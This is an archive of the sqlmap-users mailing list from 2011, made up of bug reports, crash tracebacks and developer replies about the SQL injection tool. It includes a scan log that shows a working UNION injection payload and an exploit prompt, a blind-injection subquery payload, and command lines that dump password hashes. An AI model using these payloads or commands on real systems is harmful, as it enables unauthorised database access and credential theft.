boolean-based blind - WHERE or HAVING clause' [14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:41] [INFO] testing 'Oracle AND time-based blind' [14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:42] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. you can try to explicitly set it using the --dbms optio n [14:39:44] [WARNING] GET parameter 'productid' is not injectable [14:39:44] [INFO] testing if GET parameter 'name' is dynamic [14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic [14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable [14:39:44] [INFO] testing sql injection on GET parameter 'name' [14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:46] [INFO] testing 'Oracle AND time-based blind' [14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:51] [WARNING] GET parameter 'name' is not injectable [14:39:51] [INFO] testing if GET parameter 'filename' is dynamic [14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic [14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might no t be injectable [14:39:52] [INFO] testing sql injection on GET parameter 'filename' [14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries' [14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minut es and rerun without flag T in --technique option (e.g. --flush-session --techni que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2) [14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [14:39:56] [INFO] testing 'Oracle AND time-based blind' [14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:09] [CRITICAL] unable to connect to the target url or proxy [14:40:09] [INFO] target url appears to be UNION injectable with 10 columns [14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:13] [CRITICAL] unable to connect to the target url or proxy [14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 414 HTTP(s) req uests: --- Place: GET Parameter: filename Type: UNION query Title: Generic UNION query (NULL) - 1 to 10 columns Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD iekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&cre ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti ve=on&comment=uPni --- do you want to exploit this SQL injection? [Y/n] Y [14:40:13] [INFO] testing MySQL [14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go ing to retry the request [14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form [14:40:16] [INFO] you can find results of scanning in multiple targets mode insi de the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' [*] shutting down at 14:40:16 |
|
From: Till .c. <ti...@ho...> - 2011-07-12 11:01:13
|
Hi Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected the injection point just fine, but struggled with gathering information about other tables. I guess this happened due to the fact as subqueries have been introduced with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html) and thus payloads like the following are regarded as an invalid query on mysql <4.1: [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable),1,1)) > 51 Best Regards Till |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-11 23:35:49
|
Fixed now. Thanks for reporting. Bernardo On 11 July 2011 16:04, 1ndr4 joe <c0d...@gm...> wrote: > [WARNING] unknown charset 'sql_ascii'. Please report by e-mail to > sql...@li... -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-11 23:34:07
|
Hi, This is fixed now. Thanks for reporting. Bernardo On 11 July 2011 12:10, Chris Oakley <chr...@gm...> wrote: > [12:09:23] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4253), r > etry your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to sqlmap > -u...@li... the following text and any information re > quired to reproduce the bug. The developers will try to reproduce the > bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4253) > Python version: 2.7.1 > Operating system: nt > Command line: sqlmap.py -u ******************************************* > ********* --data username=foo&password=bar&login-php-submit-button=Log > in -p username --passwords > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "sqlmap.py", line 86, in main > start() > File "C:\Program Files\sqlmap-0.9\lib\controller\controller.py", lin > e 554, in start > action() > File "C:\Program Files\sqlmap-0.9\lib\controller\action.py", line 77 > , in action > conf.dbmsHandler.getPasswordHashes(), "password hash") > File "C:\Program Files\sqlmap-0.9\plugins\generic\enumeration.py", l > ine 395, in getPasswordHashes > attackCachedUsersPasswords() > File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 240, in a > ttackCachedUsersPasswords > results = dictionaryAttack(kb.data.cachedUsersPasswords) > File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 507, in d > ictionaryAttack > p.start() > File "C:\Python27\lib\multiprocessing\process.py", line 104, in star > t > self._popen = Popen(self) > File "C:\Python27\lib\multiprocessing\forking.py", line 244, in __in > it__ > dump(process_obj, to_child, HIGHEST_PROTOCOL) > File "C:\Python27\lib\multiprocessing\forking.py", line 167, in dump > > ForkingPickler(file, protocol).dump(obj) > File "C:\Python27\lib\pickle.py", line 224, in dump > self.save(obj) > File "C:\Python27\lib\pickle.py", line 331, in save > self.save_reduce(obj=obj, *rv) > File "C:\Python27\lib\pickle.py", line 419, in save_reduce > save(state) > File "C:\Python27\lib\pickle.py", line 286, in save > f(self, obj) # Call unbound method with explicit self > File "C:\Python27\lib\pickle.py", line 649, in save_dict > self._batch_setitems(obj.iteritems()) > File "C:\Python27\lib\pickle.py", line 681, in _batch_setitems > save(v) > File "C:\Python27\lib\pickle.py", line 286, in save > f(self, obj) # Call unbound method with explicit self > File "C:\Python27\lib\pickle.py", line 748, in save_global > (obj, module, name)) > PicklingError: Can't pickle <function bruteProcess at 0x01783CF0>: it' > s not found as lib.utils.hash.bruteProcess > > [*] shutting down at 12:09:23 > > > C:\Program Files\sqlmap-0.9>Traceback (most recent call last): > File "<string>", line 1, in <module> > File "C:\Python27\lib\multiprocessing\forking.py", line 347, in main > > self = load(from_parent) > File "C:\Python27\lib\pickle.py", line 1378, in load > return Unpickler(file).load() > File "C:\Python27\lib\pickle.py", line 858, in load > dispatch[key](self) > File "C:\Python27\lib\pickle.py", line 880, in load_eof > raise EOFError > EOFError -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: 1ndr4 j. <c0d...@gm...> - 2011-07-11 15:04:54
|
[WARNING] unknown charset 'sql_ascii'. Please report by e-mail to sql...@li... |
|
From: Chris O. <chr...@gm...> - 2011-07-11 11:10:15
|
[12:09:23] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4253), r
etry your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to sqlmap
-u...@li... the following text and any information re
quired to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4253)
Python version: 2.7.1
Operating system: nt
Command line: sqlmap.py -u *******************************************
********* --data username=foo&password=bar&login-php-submit-button=Log
in -p username --passwords
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "sqlmap.py", line 86, in main
start()
File "C:\Program Files\sqlmap-0.9\lib\controller\controller.py", lin
e 554, in start
action()
File "C:\Program Files\sqlmap-0.9\lib\controller\action.py", line 77
, in action
conf.dbmsHandler.getPasswordHashes(), "password hash")
File "C:\Program Files\sqlmap-0.9\plugins\generic\enumeration.py", l
ine 395, in getPasswordHashes
attackCachedUsersPasswords()
File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 240, in a
ttackCachedUsersPasswords
results = dictionaryAttack(kb.data.cachedUsersPasswords)
File "C:\Program Files\sqlmap-0.9\lib\utils\hash.py", line 507, in d
ictionaryAttack
p.start()
File "C:\Python27\lib\multiprocessing\process.py", line 104, in star
t
self._popen = Popen(self)
File "C:\Python27\lib\multiprocessing\forking.py", line 244, in __in
it__
dump(process_obj, to_child, HIGHEST_PROTOCOL)
File "C:\Python27\lib\multiprocessing\forking.py", line 167, in dump
ForkingPickler(file, protocol).dump(obj)
File "C:\Python27\lib\pickle.py", line 224, in dump
self.save(obj)
File "C:\Python27\lib\pickle.py", line 331, in save
self.save_reduce(obj=obj, *rv)
File "C:\Python27\lib\pickle.py", line 419, in save_reduce
save(state)
File "C:\Python27\lib\pickle.py", line 286, in save
f(self, obj) # Call unbound method with explicit self
File "C:\Python27\lib\pickle.py", line 649, in save_dict
self._batch_setitems(obj.iteritems())
File "C:\Python27\lib\pickle.py", line 681, in _batch_setitems
save(v)
File "C:\Python27\lib\pickle.py", line 286, in save
f(self, obj) # Call unbound method with explicit self
File "C:\Python27\lib\pickle.py", line 748, in save_global
(obj, module, name))
PicklingError: Can't pickle <function bruteProcess at 0x01783CF0>: it'
s not found as lib.utils.hash.bruteProcess
[*] shutting down at 12:09:23
C:\Program Files\sqlmap-0.9>Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Python27\lib\multiprocessing\forking.py", line 347, in main
self = load(from_parent)
File "C:\Python27\lib\pickle.py", line 1378, in load
return Unpickler(file).load()
File "C:\Python27\lib\pickle.py", line 858, in load
dispatch[key](self)
File "C:\Python27\lib\pickle.py", line 880, in load_eof
raise EOFError
EOFError
|
|
From: Miroslav S. <mir...@gm...> - 2011-07-11 08:50:14
|
hi Jovon.
it should be fixed with the latest commit. the problem is that in your
case some of crawled links were in "invalid" form but from now on
sqlmap shouldn't crash on these any more.
kr
On Mon, Jul 11, 2011 at 6:55 AM, Ahmed Shawky <ah...@is...> wrote:
> From the exception "InvalidURL: nonnumeric port: '80#content'"
> It seems that you supplied sqlmap with Invalid URL
>
> On Mon, Jul 11, 2011 at 5:00 AM, Jovon Itwaru <jov...@gm...>
> wrote:
>>
>> Received the following error when perform crawl:
>> sqlmap version: 1.0-dev (r4243)
>> Python version: 2.6.1
>> Operating system: posix
>> Command line: ./sqlmap.py -u ******************** --crawl=2
>> Technique: None
>> Back-end DBMS: None (identified)
>> Traceback (most recent call last):
>> File "./sqlmap.py", line 77, in main
>> init(cmdLineOptions)
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837,
>> in init
>> __setCrawler()
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421,
>> in __setCrawler
>> crawler.getTargetUrls()
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line
>> 109, in getTargetUrls
>> runThreads(numThreads, crawlThread)
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104,
>> in runThreads
>> threadFunction()
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59,
>> in crawlThread
>> content = Request.getPage(url=current, crawling=True,
>> raise404=False)[0]
>> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line
>> 281, in getPage
>> conn = urllib2.urlopen(req)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 124, in urlopen
>> return _opener.open(url, data, timeout)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 383, in open
>> response = self._open(req, data)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 401, in _open
>> '_open', req)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 361, in _call_chain
>> result = func(*args)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 1130, in http_open
>> return self.do_open(httplib.HTTPConnection, req)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
>> line 1087, in do_open
>> h = http_class(host, timeout=req.timeout) # will parse host:port
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py",
>> line 656, in __init__
>> self._set_hostport(host, port)
>> File
>> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py",
>> line 668, in _set_hostport
>> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
>> InvalidURL: nonnumeric port: '80#content'
>> [*] shutting down at 22:56:17
>>
>> ------------------------------------------------------------------------------
>> All of the data generated in your IT infrastructure is seriously valuable.
>> Why? It contains a definitive record of application performance, security
>> threats, fraudulent activity, and more. Splunk takes this data and makes
>> sense of it. IT sense. And common sense.
>> http://p.sf.net/sfu/splunk-d2d-c2
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
>
> Ahmed Shawky El-Antry
> Pen-tester, Programmer and System administrator
> lnxg33k owner "http://lnxg33k.wordpress.com"
> Isecur1ty team member"http://www.isecur1ty.org"
> Twitter @lnxg33k
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
|
From: Ahmed S. <ah...@is...> - 2011-07-11 04:55:27
|
>From the exception "InvalidURL: nonnumeric port: '80#content'"
It seems that you supplied sqlmap with Invalid URL
On Mon, Jul 11, 2011 at 5:00 AM, Jovon Itwaru <jov...@gm...>wrote:
> Received the following error when perform crawl:
>
> sqlmap version: 1.0-dev (r4243)
> Python version: 2.6.1
> Operating system: posix
> Command line: ./sqlmap.py -u ******************** --crawl=2
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "./sqlmap.py", line 77, in main
> init(cmdLineOptions)
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837,
> in init
> __setCrawler()
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421,
> in __setCrawler
> crawler.getTargetUrls()
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 109,
> in getTargetUrls
> runThreads(numThreads, crawlThread)
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104,
> in runThreads
> threadFunction()
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59,
> in crawlThread
> content = Request.getPage(url=current, crawling=True,
> raise404=False)[0]
> File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line
> 281, in getPage
> conn = urllib2.urlopen(req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 124, in urlopen
> return _opener.open(url, data, timeout)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 383, in open
> response = self._open(req, data)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 401, in _open
> '_open', req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 361, in _call_chain
> result = func(*args)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 1130, in http_open
> return self.do_open(httplib.HTTPConnection, req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py",
> line 1087, in do_open
> h = http_class(host, timeout=req.timeout) # will parse host:port
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py",
> line 656, in __init__
> self._set_hostport(host, port)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py",
> line 668, in _set_hostport
> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '80#content'
>
> [*] shutting down at 22:56:17
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2d-c2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member"http://www.isecur1ty.org"
- Twitter @lnxg33k
|
|
From: Jovon I. <jov...@gm...> - 2011-07-11 03:00:20
|
Received the following error when perform crawl:
sqlmap version: 1.0-dev (r4243)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ******************** --crawl=2
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "./sqlmap.py", line 77, in main
init(cmdLineOptions)
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 1837, in init
__setCrawler()
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/option.py", line 421, in __setCrawler
crawler.getTargetUrls()
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 109, in getTargetUrls
runThreads(numThreads, crawlThread)
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/core/threads.py", line 104, in runThreads
threadFunction()
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/utils/crawler.py", line 59, in crawlThread
content = Request.getPage(url=current, crawling=True, raise404=False)[0]
File "/Users/bob/Tools/sqlmap/sqlmap-dev/lib/request/connect.py", line 281, in getPage
conn = urllib2.urlopen(req)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 124, in urlopen
return _opener.open(url, data, timeout)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 383, in open
response = self._open(req, data)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 401, in _open
'_open', req)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 361, in _call_chain
result = func(*args)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1130, in http_open
return self.do_open(httplib.HTTPConnection, req)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/urllib2.py", line 1087, in do_open
h = http_class(host, timeout=req.timeout) # will parse host:port
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 656, in __init__
self._set_hostport(host, port)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/httplib.py", line 668, in _set_hostport
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '80#content'
[*] shutting down at 22:56:17 |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-09 08:29:09
|
Hi Zeze, Perhaps because the session user does not have read privileges over the table you're trying to dump? Try to run with --parse-errors to see if the web application discloses DBMS error and -v 3. Run also with --privileges -U CU to see the current user's privileges. Bernardo On 8 July 2011 23:09, Zeze Canarinha <zez...@gm...> wrote: > New fresh install. > > Appears to be everything ok... Or not... Data in not being shown. > > Sqlinjection is ok, found database, tables and columns but no data is show. > > Anyone having this problem? > > BS -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-09 08:27:42
|
Hi Zeze, This is fixed as of yesterday night. Bernardo On 8 July 2011 22:24, Zeze Canarinha <zez...@gm...> wrote: > Sirs, > > After the update of today... :| > > [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4236), retry your > run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any > information required to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4236) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -u > *********************************************************************************** > --random-agent -D ************ -T ******** --columns threads 5 > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", > line 535, in start > __saveToSessionFile() > File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", > line 166, in __saveToSessionFile > setInjection(inj) > File "/pentest/web/scanners/sqlmap/lib/core/session.py", line 55, in > setInjection > and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection > data"][:-1]).data.keys(),\ > File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 44, in > base64unpickle > return pickle.loads(base64decode(value)) > File "/usr/lib/python2.6/pickle.py", line 1374, in loads > return Unpickler(file).load() > File "/usr/lib/python2.6/pickle.py", line 858, in load > dispatch[key](self) > File "/usr/lib/python2.6/pickle.py", line 1090, in load_global > klass = self.find_class(module, name) > File "/usr/lib/python2.6/pickle.py", line 1126, in find_class > klass = getattr(mod, name) > AttributeError: 'module' object has no attribute 'injectionDict' > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Miroslav S. <mir...@gm...> - 2011-07-09 08:18:22
|
hi Olu. this should be fixed with r4237. kr On Sat, Jul 9, 2011 at 1:16 AM, Olu Akindeinde <sey...@gm...> wrote: > Hi, > Ran into this error whilst performing a test > sqlmap version: 1.0-dev (r4236) > Python version: 2.6.1 > Operating system: posix > Command line: ./sqlmap.py -u *********************************************** > --forms -D ****** --tables -v 3 --level=3 --technique=B > Technique: BOOLEAN > Back-end DBMS: Microsoft SQL Server (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/Users/fx/sqlmap/lib/controller/controller.py", line 535, in start > __saveToSessionFile() > File "/Users/fx/sqlmap/lib/controller/controller.py", line 166, in > __saveToSessionFile > setInjection(inj) > File "/Users/fx/sqlmap/lib/core/session.py", line 55, in setInjection > and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection > data"][:-1]).data.keys(),\ > File "/Users/fx/sqlmap/lib/core/convert.py", line 44, in base64unpickle > return pickle.loads(base64decode(value)) > File > "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", > line 1374, in loads > return Unpickler(file).load() > File > "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", > line 858, in load > dispatch[key](self) > File > "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", > line 1090, in load_global > klass = self.find_class(module, name) > File > "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py", > line 1126, in find_class > klass = getattr(mod, name) > AttributeError: 'module' object has no attribute 'injectionDict' > [*] shutting down at 00:14:18 > Thanks > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Olu A. <sey...@gm...> - 2011-07-08 23:16:58
|
Hi,
Ran into this error whilst performing a test
sqlmap version: 1.0-dev (r4236)
Python version: 2.6.1
Operating system: posix
Command line: ./sqlmap.py -u ***********************************************
--forms -D ****** --tables -v 3 --level=3 --technique=B
Technique: BOOLEAN
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 86, in main
start()
File "/Users/fx/sqlmap/lib/controller/controller.py", line 535, in start
__saveToSessionFile()
File "/Users/fx/sqlmap/lib/controller/controller.py", line 166, in
__saveToSessionFile
setInjection(inj)
File "/Users/fx/sqlmap/lib/core/session.py", line 55, in setInjection
and intersect(base64unpickle(kb.resumedQueries[conf.url]["Injection
data"][:-1]).data.keys(),\
File "/Users/fx/sqlmap/lib/core/convert.py", line 44, in base64unpickle
return pickle.loads(base64decode(value))
File
"/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py",
line 1374, in loads
return Unpickler(file).load()
File
"/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py",
line 858, in load
dispatch[key](self)
File
"/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/pickle.py",
